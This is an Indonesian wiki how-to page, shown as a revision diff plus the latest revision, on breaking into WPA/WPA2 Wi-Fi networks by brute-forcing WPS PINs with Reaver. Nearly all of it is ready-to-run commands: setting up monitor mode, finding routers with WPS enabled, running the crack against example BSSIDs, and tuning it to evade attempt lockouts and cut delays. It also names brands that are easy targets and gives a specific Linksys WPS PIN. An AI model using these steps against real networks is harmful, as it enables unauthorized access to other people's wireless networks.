Reaver teknik menjebol WPA: Difference between revisions
Onnowpurbo (talk | contribs) New page: Sumber: http://www.wirelessdomination.com/how-to-crack-wpa2-wifi-password-using-reaver-wpa2/ WPS ada di kebanyakan router untuk proses setup yang mudah melalui pin WPS, yang di hard-coded... |
Onnowpurbo (talk | contribs) |
||
| (3 intermediate revisions by the same user not shown) | |||
| Line 10: | Line 10: | ||
==Aktifkan Mode Monitor== | |||
Lakukan | |||
airmon-ng check kill | |||
airmon-ng start wlan0 | |||
==Cek AP yang WPS-nya aktif== | |||
Lakukan | |||
wash -i mon0 | |||
Mikrotik biasanya tidak mengaktifkan WPS, jadi akan susah menjebol Mikrotik. | |||
Sebaliknya, Linksys, TP-Link dll biasanya mengaktifkan WPS. | |||
==Crack== | |||
Lakukan | |||
reaver -i monitormode -c channel -b targetbssid -vv | |||
reaver -i mon0 -c 1 -b C8:3A:35:54:88:81 -vv | |||
==Tip & Trick== | |||
Sebaiknya pin WPS yang sudah di crack kita simpan, agar bisa lebih mudah meng-crack password kalau AP mengubah password-nya. | |||
reaver -i (monitor interface) -b (BSSID) -c (channel) --pin=(8 digit pin) -vv | |||
reaver -i mon0 -b 11:22:33:44:55:66 -c 1 --pin=12345678 -vv | |||
Jika setelah 10 WPS ada error, ada warning message. Ini berarti AP membatasi pin attempt. Kita perlu wait, | |||
reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360 | |||
Default receive timeout 5 detik. Bisa di set secara manual, minimum default 1 detik. | |||
reaver -i mon0 -b 00:01:02:03:04:05 -t 3 | |||
Default delay antara pin attempt adalah 1 detik, nilai ini dapat di naikan / diturunkan. Nilai 0 adalah tanpa delay. | |||
reaver -i mon0 -b 00:01:02:03:04:05 -d 0 | |||
==Contoh PIN WPS== | |||
Di Linksys WAP610N 98539437 | |||
==Referensi== | ==Referensi== | ||
* http://www.wirelessdomination.com/how-to-crack-wpa2-wifi-password-using-reaver-wpa2/ | * http://www.wirelessdomination.com/how-to-crack-wpa2-wifi-password-using-reaver-wpa2/ | ||
Latest revision as of 01:55, 14 January 2016
Sumber: http://www.wirelessdomination.com/how-to-crack-wpa2-wifi-password-using-reaver-wpa2/
WPS ada di kebanyakan router untuk proses setup yang mudah melalui pin WPS, yang di hard-coded ke Access Point wireless. Reaver mengambil keuntungan dari kerentanan di WPS. Terima kasih kepada Craig Heffner untuk merilis versi open-source dari tool ini yang bernama Reaver yang mengeksploitasi kerentanan. Dalam istilah sederhana, Reaver mencoba untuk bruteforce pin; yang akan mengungkapkan WPA atau WPA2 password setelah cukup waktu.
Kumpulkan Informasi
Lakukan
airmon-ng
Aktifkan Mode Monitor
Lakukan
airmon-ng check kill airmon-ng start wlan0
Cek AP yang WPS-nya aktif
Lakukan
wash -i mon0
Mikrotik biasanya tidak mengaktifkan WPS, jadi akan susah menjebol Mikrotik. Sebaliknya, Linksys, TP-Link dll biasanya mengaktifkan WPS.
Crack
Lakukan
reaver -i monitormode -c channel -b targetbssid -vv reaver -i mon0 -c 1 -b C8:3A:35:54:88:81 -vv
Tip & Trick
Sebaiknya pin WPS yang sudah di crack kita simpan, agar bisa lebih mudah meng-crack password kalau AP mengubah password-nya.
reaver -i (monitor interface) -b (BSSID) -c (channel) --pin=(8 digit pin) -vv reaver -i mon0 -b 11:22:33:44:55:66 -c 1 --pin=12345678 -vv
Jika setelah 10 WPS ada error, ada warning message. Ini berarti AP membatasi pin attempt. Kita perlu wait,
reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360
Default receive timeout 5 detik. Bisa di set secara manual, minimum default 1 detik.
reaver -i mon0 -b 00:01:02:03:04:05 -t 3
Default delay antara pin attempt adalah 1 detik, nilai ini dapat di naikan / diturunkan. Nilai 0 adalah tanpa delay.
reaver -i mon0 -b 00:01:02:03:04:05 -d 0
Contoh PIN WPS
Di Linksys WAP610N 98539437